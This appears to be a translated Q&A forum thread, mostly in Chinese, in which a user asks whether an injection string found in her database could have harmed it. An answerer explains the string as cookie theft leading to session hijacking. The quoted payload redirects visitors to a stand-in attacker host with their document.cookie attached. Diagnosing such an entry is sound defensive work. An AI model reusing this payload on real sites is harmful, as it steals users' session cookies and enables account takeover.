我刚刚在我的数据库中发现了一些看起来可能是注入尝试的东西。我想知道他们是否可能对我的数据库做了任何恶意攻击。感谢。
Your search for 'flowers evil_script()' returned the following results:evil_script()' returned the following results
Window.location='http:attacker?cookie='+document.cookie.
答案 0 :(得分:1)
@jessica,对我而言,该脚本似乎试图将用户与cookie一起重定向到攻击者网站。此可以用于尝试窃取用户的会话cookie,并基本上以该用户身份登录。
如果受影响的用户是管理员或具有提升权限的用户,则攻击者将拥有与该用户相同的权限。
如果你能在数据库的某个地方找到实际的脚本(网站文件),或者有人刚刚在你的网站上搜索并发现错误,我会很好奇。
这是在记录表中找到的吗?